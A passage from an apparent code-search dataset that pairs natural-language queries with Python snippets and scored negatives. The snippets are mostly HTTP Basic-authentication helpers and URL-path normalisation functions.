        self.auth = 'Basic ' + string.strip(base64.encodestring(username + ':' + password))
    else:
        self.auth = None
    self.connection_method = httplib.HTTPSConnection if ssl else httplib.HTTPConnection
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def basic_authentication(self, username: str, password: str) -> None:\n self.api_session.auth = (username, password)", "def authenticate():\n return Response(\n 'Could not verify your credentials for that url', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n '', 401, {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials.', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 
'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\r\n return Response(\r\n 'Could not verify your access level for that URL.\\n'\r\n 'You have to login with proper credentials', 401,\r\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def set_basic_auth(self, host, username, password):\n raise NotImplementedError(\n u\"%s: Method not implemented\", self.__class__.__name__)", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 
'Basic realm=\"Login Required\"'})", "def authenticate(self, username, password):\n return None", "def authenticate():\n\treturn Response(\n\t'Could not verify your access level for that URL.\\n'\n\t'You have to login with proper credentials', 401,\n\t{'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response('Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials',\n 401,\n {\n 'WWW-Authenticate': 'Basic realm=\"Login Required\"'\n }\n )", "def login(self, username, password=None):\n password = USERNAME_PASSWORD_MAP.get(username, username)\n self.addHeader(\n 'Authorization', 'Basic {username}:{password}'.format(\n username=username, password=password))\n return self", "def authenticate():\n return send_msg(\n 401,\n 'Must be connected',\n headers={'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def auth_http_request(method, uri, **kwargs):\n\n kwargs[\"headers\"] = _get_datacom_headers(method, kwargs.get(\"headers\"))\n\n logger.debug(\"auth request headers: %s\" % kwargs[\"headers\"])\n\n resp = make_http_request(method, uri, **kwargs)\n\n if not resp.ok:\n raise BadAuthentication(resp.status_code, resp.url, body=resp.content)\n\n return resp", "def authenticate(self):\n r = requests.head(self.url + '/v2/', verify=self.verify_ssl)\n self._authenticate_for(r)", "def authenticate(credentials):", "def authenticate():\n return Response('Not Authorized', 401, {'WWW-Authenticate': 'Basic realm=\"api\"'})", "def auth_handler(self, url, method, timeout, headers, data):\n username = self.username\n password = self.password\n return basic_auth_handler(url, method, timeout, headers, data, username,\n password)", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with Web Manager credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def credentials(self) -> HTTPBasicAuth:\n if self.user is None or self.password is None:\n return None\n else:\n return HTTPBasicAuth(self.user, self.password)", "def authenticate():\n\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n get_auth_headers())", "def get_auth(self, username, password):\n raise NotImplementedError()", "def add_basic_auth(self, credentials: t.Tuple[str, str]) -> 'Request':\n username, password = credentials\n encoded = b64encode(f'{username}:{password}'.encode('ascii'))\n return self.add_headers({\n 'Authorization': f'Basic {encoded.decode(\"ascii\")}'})", "def demo_auth(self, auth=None, url=None):\n assert all([\n auth or url, # Must provide at least one\n not (auth and url) # Cannot provide more than one\n ])\n if url is None:\n url = \"https://piazza.com/demo_login\"\n params = dict(nid=self._nid, auth=auth)\n res = requests.get(url, params=params)\n else:\n res = requests.get(url)\n self.cookies = res.cookies", "def _login(self, environ, start_response):\n response = HTTPUnauthorized()\n response.www_authenticate = ('Basic', {'realm': self._realm})\n return 
response(environ, start_response)", "def authenticate():\n return flask.Response('Login required.', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def auth(self, username, password):\n return False", "def authenticate_http(self, f: http.HTTPFlow) -> bool:\n assert self.validator\n username = None\n password = None\n is_valid = False\n\n is_proxy = is_http_proxy(f)\n auth_header = http_auth_header(is_proxy)\n try:\n auth_value = f.request.headers.get(auth_header, \"\")\n scheme, username, password = parse_http_basic_auth(auth_value)\n is_valid = self.validator(username, password)\n except Exception:\n pass\n\n if is_valid:\n f.metadata[\"proxyauth\"] = (username, password)\n del f.request.headers[auth_header]\n return True\n else:\n f.response = make_auth_required_response(is_proxy)\n return False", "def _authenticate(connection: typing.Union[ssl.SSLSocket, socket.socket],\n endpoint: urllib.parse.ParseResult,\n username: str,\n password: str) -> None:\n auth_token = base64.b64encode(b':'.join((username.encode('latin1'), password.encode('latin1'))))\n headers = [\n 'PUT ' + endpoint.path + ' HTTP/1.1',\n 'Host: ' + endpoint.netloc,\n 'Authorization: Basic ' + auth_token.strip().decode('latin1'),\n 'User-Agent: studio',\n 'Accept: */*',\n 'Transfer-Encoding: chunked',\n 'Content-Type: audio/mpeg',\n 'Ice-Public: 1',\n 'Ice-Name: Radio stream',\n 'Ice-Description: Stream from the radio studio',\n 'Expect: 100-continue',\n '',\n ''\n ]\n connection.send('\\r\\n'.join(headers).encode('latin1'))", "def login(self):\n req_url = 'http://{}:{}/api/'.format(self.server, self.port)\n return requests.head(\n req_url,\n auth=requests.auth.HTTPBasicAuth(self.username, self.password)\n )", "def authenticate(self):\n return Response(\n 'Could not verify your access level for that URL.\\nYou have to login with proper credentials',\n 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'}\n )", "def request_authentication(user: str, password: str) -> bool:\n # request URL using GET method adding authorization header\n response = requests.get(url=\"https://httpbin.org/basic-auth/correlaid/password\",\n auth=(user, password))\n # parse response\n parsed_response = response.json()\n # return authenticated key\n return parsed_response[\"authenticated\"]", "def authenticate(self, username: str, password: str) -> Optional[str]:", "def authenticate(self, username: str, password: str) -> Optional[str]:", "def user_must_authenticate():\n return Response(\n 'Could not verify your access level for that URL.\\n'\n 'You have to login with proper credentials', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})", "def authenticate():\n return Response(\n 'Could not verify your access level for that URL, need token.\\n', 403,\n {'WWW-Authenticate': 'Basic realm=\"token Required\"'})", "def authenticate(self, request):\n return None", "def get_webpage_with_auth(url, username, password, logger):\n try:\n response = requests.get(url, auth=HTTPBasicAuth(username, password))\n return response.content\n except requests.exceptions.SSLError as e:\n logger.error('SSL error occurred while trying to retrieve {}\\nGot error: {}'.format(url, e))\n except requests.exceptions.BaseHTTPError as e:\n logger.error('HTTP error occurred while trying to retrieve {}\\nGot error: {}'.format(url, e))\n except Exception as e:\n logger.error('Unknown error occurred while trying to retrieve {}\\nError msg: {}'.format(url, e))", "def _login(self, username, password):\n\n auth_token_header_name = \"X-AuthToken\"\n 
if auth_token_header_name not in self.headers:\n login_response = self._send(\"/auth/login\", \"POST\", {\n \"username\": username,\n \"password\": password\n })\n try:\n auth_token = login_response.json()[\"authToken\"]\n except KeyError:\n raise AuthorizationError()\n auth_header = {auth_token_header_name: auth_token}\n self.headers.update(auth_header)", "def _auth():\n with open('api-credentials.txt', 'r') as f:\n lines = f.read().splitlines()\n credentials = lines[0] + ':' + lines[1]\n return 'Basic ' + base64.b64encode(credentials.encode()).decode()", "def authenticate(self, username, password):\n auth = (username, password)\n res = requests.get(\n self.normalize_admin_url(\"authenticate\"),\n headers={\"user-agent\": self.u_agent},\n auth=auth,\n verify=False,\n )\n if res.status_code == 200:\n # authentication ok, keep authentication info for future use\n self.auth = auth\n return Response(0, \"Successfully logged in\")\n elif res.status_code == 401:\n try:\n val = res.json()\n except ValueError:\n val = \"Login credentials not accepted\"\n return Response(401, val)\n else:\n return Response(res.status_code, res.content)", "def __init__(__self__, *,\n auth_type: pulumi.Input[str],\n username: pulumi.Input[str],\n ca_cert_resource_id: Optional[pulumi.Input[str]] = None,\n password: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"auth_type\", 'BasicAuth')\n pulumi.set(__self__, \"username\", username)\n if ca_cert_resource_id is not None:\n pulumi.set(__self__, \"ca_cert_resource_id\", ca_cert_resource_id)\n if password is not None:\n pulumi.set(__self__, \"password\", password)", "def authenticate(self):\n abort(\n 401,\n description=self.exception,\n www_authenticate=(\"WWW-Authenticate\", 'Basic realm=\"%s\"' % __package__),\n )", "def open_https(self, url, data=None, ssl_context=None):\n # type: (AnyStr, Optional[bytes], Optional[SSL.Context]) -> addinfourl\n if ssl_context is not None and isinstance(ssl_context, SSL.Context):\n self.ctx = ssl_context\n else:\n self.ctx = SSL.Context()\n user_passwd = None\n if isinstance(url, six.string_types):\n try: # python 2\n # http://pydoc.org/2.5.1/urllib.html\n host, selector = splithost(url)\n if host:\n user_passwd, host = splituser(host)\n host = unquote(host)\n realhost = host\n except NameError: # python 3 has no splithost\n # https://docs.python.org/3/library/urllib.parse.html\n parsed = urlparse(url)\n host = parsed.hostname\n if parsed.port:\n host += \":{0}\".format(parsed.port)\n user_passwd = parsed.username\n if parsed.password:\n user_passwd += \":{0}\".format(parsed.password)\n selector = parsed.path\n else:\n host, selector = url\n urltype, rest = splittype(selector)\n url = rest\n user_passwd = None\n if urltype.lower() != 'http':\n realhost = None\n else:\n try: # python 2\n realhost, rest = splithost(rest)\n if realhost:\n user_passwd, realhost = splituser(realhost)\n if user_passwd:\n selector = \"%s://%s%s\" % (urltype, realhost, rest)\n except NameError: # python 3 has no splithost\n parsed = urlparse(rest)\n host = parsed.hostname\n if parsed.port:\n host += \":{0}\".format(parsed.port)\n user_passwd = parsed.username\n if parsed.password:\n user_passwd += \":{0}\".format(parsed.password)\n # print(\"proxy via http:\", host, selector)\n if not host:\n raise IOError('http error', 'no host given')\n if user_passwd:\n import base64\n auth = base64.encodestring(user_passwd).strip()\n else:\n auth = None\n # Start here!\n h = httpslib.HTTPSConnection(host=host, ssl_context=self.ctx)\n # h.set_debuglevel(1)\n 
# Stop here!\n if data is not None:\n h.putrequest('POST', selector)\n h.putheader('Content-type', 'application/x-www-form-urlencoded')\n h.putheader('Content-length', '%d' % len(data))\n else:\n h.putrequest('GET', selector)\n if auth:\n h.putheader('Authorization', 'Basic %s' % auth)\n for args in self.addheaders:\n h.putheader(*args) # for python3 - used to use apply\n h.endheaders()\n if data is not None:\n h.send(data + '\\r\\n')\n # Here again!\n resp = h.getresponse()\n fp = resp.fp\n return addinfourl(fp, resp.msg, \"https:\" + url)\n # Stop again.", "def set_headers(username, password):\n REQUESTS_HEADERS[\"username\"] = username\n REQUESTS_HEADERS[\"password\"] = password\n REQUESTS_HEADERS[\"Content-Type\"] = \"application/json\"", "def check_auth(username, password):\n return basic_login(username, password)", "def authenticate():\n return abort(401)", "def authenticate(request=None, **credentials):\n print request, credentials", "def auth(username='', pw='', session=''):\n if (len(username) > 0 and len(pw) > 0) or len(session) > 0:\n url = wwl.server(secure=True)\n f = dict()\n if len(username) > 0:\n f['username']=username\n f['pw']=pw\n else:\n f['session']=session\n form_data = urllib.urlencode(f)\n url = wwl.server() + '/users/auth'\n result = urllib2.urlopen(url, form_data)\n tt = result.read()\n return tt\n else:\n return ''", "def __init__(self, url, username, password):\n self.session = requests.session()\n self.session.auth = (username, password)\n self.session.headers.update({\n 'Accept': JSON_CONTENT_TYPE,\n })\n self.url = url", "def authenticate(self, uri):\n return self.username, self.password", "def __auth(username, password, type=\"basic\"): # pylint:disable=redefined-builtin\n # TODO: Handle encrypted passwords.\n if type.lower() == \"basic\":\n return HTTPBasicAuth(username, password)\n return HTTPDigestAuth(username, password)", "def authorize(username, password):\n\ts = '%s:%s' % (username, password)\n\tPAYLOAD_HEADERS['Authorization'] = b'Basic ' + base64.b64encode(s.encode('ascii'))", "def __init__(__self__, *,\n password: pulumi.Input[str],\n server: pulumi.Input[str],\n type: pulumi.Input[str],\n username: pulumi.Input[str]):\n pulumi.set(__self__, \"password\", password)\n pulumi.set(__self__, \"server\", server)\n pulumi.set(__self__, \"type\", 'BasicAuth')\n pulumi.set(__self__, \"username\", username)", "def authenticate(self, headers):\n try:\n from base64 import b64decode\n (basic, _, encoded) = headers.get('Authorization').partition(' ')\n assert basic == 'Basic', 'Only basic authentication supported'\n encodedByteString = encoded.encode()\n decodedBytes = b64decode(encodedByteString)\n decodedString = decodedBytes.decode()\n (username, _, password) = decodedString.partition(':')\n return (username == XMLRPC_SERVER_USER and password == XMLRPC_SERVER_PASSWORD)\n except:\n return False", "def get_authenticate_header(self):\n return f'Basic realm=\"{self.www_authenticate_realm}\"'", "def basic_http_auth(f):\n def wrap(request, *args, **kwargs):\n if request.META.get('HTTP_AUTHORIZATION', False):\n authtype, auth = request.META['HTTP_AUTHORIZATION'].split(' ')\n auth = base64.b64decode(auth)\n username, password = auth.split(':')\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return f(request, *args, **kwargs)\n else:\n r = HttpResponse(\"Auth Required\", status = 401)\n r['WWW-Authenticate'] = 'Basic realm=\"ThatPanda DDNS\"'\n return r\n r = HttpResponse(\"Auth 
Required\", status = 401)\n r['WWW-Authenticate'] = 'Basic realm=\"ThatPanda DDNS\"'\n return r\n \n return wrap", "def __init__(self, user, password, host='localhost', port=22555,\n use_https=False):\n url = 'http{s}://{user}:{password}@{host}:{port}/'.format(\n s='s' if use_https else '',\n user=user, password=password, host=host, port=port)\n self.url = url\n self.proxy = AuthServiceProxy(url, exception_wrapper=wrap_exception)", "def __init__(self, host, username, password, is_ssl=False, retries=None):\r\n self.host = host\r\n self.username = username\r\n self.password = password\r\n self.is_ssl = self.is_true(is_ssl)\r\n self.retries = retries", "def authenticate_credentials(self, **credentials):\n return None", "def basic_auth(\n monkeypatch: pytest.MonkeyPatch,\n username: str = \"test_user\",\n password: str = \"r4ndom_bUt_memorable\",\n) -> tuple:\n monkeypatch.setenv(\"BASIC_AUTH_USERNAME\", username)\n monkeypatch.setenv(\"BASIC_AUTH_PASSWORD\", password)\n assert os.getenv(\"BASIC_AUTH_USERNAME\") == username\n assert os.getenv(\"BASIC_AUTH_PASSWORD\") == password\n return username, password", "def add_auth(self, http_request):\r\n pass", "def authenticate(self):\n self.connection.authenticate()", "def __init__(self):\n self.__client = Client(verify_ssl_cert=True)\n self.__headers = {'Content-Type': 'application/json'}\n self.login()", "def add_basic_auth(blueprint: Blueprint, username, password, realm='api'):\n\n @blueprint.before_request\n def basic_http_auth(*args, **kwargs):\n auth = request.authorization\n if auth is None or auth.password != password or auth.username != username:\n return Response('Please login', 401, {'WWW-Authenticate': f'Basic realm=\"{realm}\"'})", "def _auth_remoteloadjson(user: str, passwd: str) -> None:\n auth = base64.b64encode(f\"{user}:{passwd}\".encode())\n opener = request.build_opener()\n opener.addheaders = [(\"Authorization\", f\"Basic {auth.decode()}\")]\n request.install_opener(opener)", "async def authenticate(self, request: Request):\n\n pass", "def login(host, port, username, password):\n\n headers = {'X-Csrf-Token': '1'}\n host = \"https://{}:{}\".format(host, port)\n url = urlparse.urljoin(host, AUTH_PATH)\n auth = requests.auth.HTTPBasicAuth(username, password)\n\n response = requests.get(url, verify=False, headers=headers, auth=auth)\n\n parsed_url = urlparse.urlparse(response.url)\n token_frags = parsed_url.fragment.split('&')\n token_pieces = {m.split('=')[0]: m.split('=')[1] for m in token_frags}\n token = token_pieces['access_token']\n\n return token", "def _http_request(self, req):\n if self._username and self._password:\n base64string = base64.encodestring('%s:%s' % (self._username, self._password))[:-1]\n req.add_header(\"Authorization\", \"Basic %s\" % base64string)\n\n try:\n return urllib2.urlopen(req).read()\n except urllib2.URLError, e:\n clsname = self.__class__.__name__\n name = clsname.replace('MediaBackend', '')\n \n self.log.warning(\"Couldn't connect to %s at %s, are you sure it's running?\", name, self.host_string())\n return None", "def authenticate(self):\n resp = Response(None, 401)\n abort(401, description='Please provide proper credentials', response=resp)" ]
[ "0.68551093", "0.6853429", "0.6646717", "0.66217005", "0.6620933", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.66114116", "0.65910184", "0.6568698", "0.65364164", "0.65364164", "0.65364164", "0.65364164", "0.65364164", "0.65364164", "0.65364164", "0.65364164", "0.6531353", "0.652657", "0.6513777", "0.6502004", "0.6492069", "0.6468011", "0.6442731", "0.6405746", "0.6397832", "0.63894904", "0.6377314", "0.63749427", "0.6343895", "0.6314837", "0.6313272", "0.63083977", "0.62936795", "0.62704974", "0.626705", "0.6263158", "0.6254442", "0.62493896", "0.62470317", "0.6230606", "0.6220748", "0.62109834", "0.6201165", "0.6201165", "0.61974114", "0.6191178", "0.6181394", "0.6174796", "0.61542434", "0.61297363", "0.6116546", "0.6112256", "0.6112166", "0.6095658", "0.60925835", "0.60867", "0.60698867", "0.60393465", "0.60216224", "0.5998636", "0.5997593", "0.5992796", "0.5991736", "0.5983919", "0.5975483", "0.5965089", "0.5946033", "0.59406704", "0.5930144", "0.5927415", "0.59150356", "0.59095293", "0.5903892", "0.5893015", "0.5889784", "0.58860594", "0.5885239", "0.58778447", "0.5877236", "0.58764845" ]
0.5987323
83
Ensures that the path starts with a '/'
def ensure_path(self, page):
    return page if page.startswith('/') else "/{0}".format(page)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def validate_short_path(short_path):", "def test_normalize_path(self):\n self.assertEqual(normalize_path(\"//////\"), \"/\")\n self.assertEqual(normalize_path(\"//\"), \"/\")\n self.assertEqual(normalize_path(\"//foo/bar//baz\"), \"/foo/bar/baz\")\n self.assertEqual(normalize_path(\"//foo/bar//baz/\"), \"/foo/bar/baz/\")\n self.assertEqual(normalize_path(\"//f%20oo/bar\"), \"/f oo/bar\")", "def path_validate(path):\n # functionality to be added later\n return path", "def validate_path(self, path):\n return True # Allow anything in path, even spaces\n # pattern = r'(/?[a-zA-Z_][a-zA-Z0-9_]*)+$' # require start with letter\n # pattern = r'(/?[a-zA-Z0-9_]*)+$' # allow start with number\n pattern = r'^([^ ]+)$' # allow anything except spaces\n if path == '' or re.match(pattern, path):\n return\n raise ValueError(\"Invalid path (spaces not allowed):\\n'%s'\" % path)", "def leadingSlash(path):\n if path == None or len(path) == 0 or path == '/':\n return '/'\n if path[0] == '/':\n return path\n else:\n return '/' + path", "def starts_slash(url):\n return url if url.startswith(\"/\") else \"/\" + url", "def validpath(self, path):\n root = self.realpath(self.root)\n path = self.realpath(path)\n if not self.root.endswith(os.sep):\n root = self.root + os.sep\n if not path.endswith(os.sep):\n path = path + os.sep\n if path[0:len(root)] == root:\n return True\n return False", "def _is_bad_path(path, base):\r\n return not resolved(joinpath(base, path)).startswith(base)", "def ensure_slash(text):\n if text.startswith('/'):\n return text\n return '/' + text", "def matches_path(cls, path):\n return path.startswith('/') or \\\n path.startswith('./') or \\\n path.startswith('../') or \\\n path.startswith('file://')", "def ValidatePath(self, root_path: str) -> bool:\n if 'silver' in root_path:\n return True\n\n return False", "def ValidatePath(self, root_path: str) -> bool:\n if 'gold' in root_path:\n return True\n\n return False", "def is_path(self, s):\n return True", "def test_predicates_on_unsanitized_paths(self):\n self.mfs.add_entries({'/just/another/pythonista': ''})\n\n self.assertTrue(os.path.isdir('///just'))\n self.assertTrue(os.path.isdir('///just/////another'))\n self.assertTrue(os.path.exists('///just////another////////pythonista'))\n self.assertTrue(os.path.isfile('///just////another////////pythonista'))", "def _normalize_path(path):\n if path is None:\n directory = BASE_PATH\n path = ''\n else:\n path = op.normpath(path)\n directory = op.normpath(op.join(BASE_PATH, path))\n\n if not is_in_folder(BASE_PATH, directory):\n abort(404)\n\n if not op.exists(directory):\n abort(404)\n\n return BASE_PATH, directory, path", "def test_invalid_pathname(self):\n self.assertFalse(Util.is_pathname_valid(''))", "def _get_full_path(self, path, environ):\n if path.startswith('//'):\n path = path[1:]\n elif path.startswith('/'):\n path = environ.get('SCRIPT_NAME', '') + path\n return path", "def standardize_path(path):\n path.rstrip('/')\n if not path.startswith('.*'):\n path = '/' + path\n path = re.compile('/+').sub('/', path)\n return path", "def dir_path(path):\n pattern='^(.*)[/]$'\n matchobj=re.match(pattern,path)\n if matchobj:\n return path\n else:\n return path+'/'", "def check_path(self, path):\n if path in self.app_path:\n return True\n else:\n return False", "def normalizePath(path):\n if path == None or len(path) == 0 or path == '/':\n return '/'\n buff = '/' + path if path[0] != '/' else path\n return buff.replace('//', '/')", "def validateObjectPath(p):\n if not p.startswith('/'):\n raise 
MarshallingError('Object paths must begin with a \"/\"')\n if len(p) > 1 and p[-1] == '/':\n raise MarshallingError('Object paths may not end with \"/\"')\n if '//' in p:\n raise MarshallingError('\"//\" is not allowed in object paths\"')\n if invalid_obj_path_re.search(p):\n raise MarshallingError('Invalid characters contained in object path')", "def validate_safe_path(value):\n base = \"/input/\"\n\n try:\n new_path = safe_join(base, value)\n except SuspiciousFileOperation:\n raise ValidationError(\"Relative paths are not allowed.\")\n\n valid_path = new_path[len(base) :]\n\n if value != valid_path:\n raise ValidationError(f\"Invalid file path, should be {valid_path}.\")", "def ensure_path(path):\n\n path = os.path.expanduser(path)\n #Do not take into consideration the last path element\n #Unless it end with '/'\n os.makedirs('/'.join(path.split('/')[:-1]), exist_ok=True)\n return path", "def test_path(self):\n self.assertEqual(self.ftp_case.path, '/rfc/rfc1808.txt')\n self.assertEqual(self.ldap_case.path, '/c=GB')\n self.assertEqual(self.news_case.path, \n 'comp.infosystems.www.servers.unix')\n self.assertEqual(self.telnet_case.path, '/')\n self.assertEqual(self.urn_case.path, \n 'oasis:names:specification:docbook:dtd:xml:4.1.2')", "def validate(self, uri_path, fs_path):\n if not os.path.exists(fs_path):\n raise Response(404)\n elif os.path.isdir(fs_path) and not uri_path.endswith('/'):\n new_location = '%s/' % uri_path\n response = Response(301)\n response.headers['Location'] = new_location\n raise response\n return fs_path", "def chkPath(fullPath: str) -> None:\n\n # Check if path already exist.\n p = os.path.split(fullPath)\n exists = os.path.exists(p[0])\n # If not then create it.\n if exists == False:\n try:\n os.makedirs(p[0])\n except:\n print(\"Failed to create requested path.\")", "def valid_path(s):\n if len(s) > 0:\n return s\n else:\n raise argparse.ArgumentTypeError('path cannot be empty')", "def name_check(dirname):\r\n\tif dirname[-1] == \" \":\r\n\t\tdirname = dirname[:-1]\r\n\tif dirname[-1] != \"/\":\r\n\t\tdirname += \"/\"\r\n\treturn dirname", "def ensureOneSlash(s):\n\treturn s.rstrip(\"/\")+\"/\"", "def test_remove_extra_slash():\n # TODO: Should we actually do this?\n # TODO: See https://webmasters.stackexchange.com/questions/8354/what-does-the-double-slash-mean-in-urls/8381#8381\n assert (normalize_url(\"http://www.example.com/foo//bar.html\") ==\n \"http://www.example.com/foo/bar.html\")\n assert(normalize_url(\"http://example.com///abc\") ==\n \"http://example.com/abc\")", "def check_valid_path(path):\n\n path = os.path.normpath(path)\n if not os.path.exists(path):\n print(f\"{path} doesn't exist\")\n print('Code execution exit')\n sys.exit()", "def validated_path(basepath, env = None, *path):\n if basepath is not None:\n result = os.path.realpath(os.path.join(os.path.expanduser(basepath), *path))\n\n if env is not None and not os.path.isdir(result):\n env.warn(result + ' not found.')\n\n return result\n else:\n raise ValueError", "def verify_root_path(self) -> None:\n path = \"/\"\n with self.assertRaises(AccessDeniedException):\n verify_file_path(path)", "def test_path(self):\n urlpath = url.URL.fromString(\"http://example.com/foo/bar?baz=quux#foobar\")\n self.assertEqual(urlpath.path, \"foo/bar\")\n urlpath = url.URL.fromString(\"http://example.com/foo%2Fbar?baz=quux#foobar\")\n self.assertEqual(urlpath.path, \"foo%2Fbar\")\n urlpath = url.URL.fromString(\"http://example.com/-_.!*'()?baz=quux#foo\")\n self.assertEqual(urlpath.path, \"-_.!*'()\")", "def 
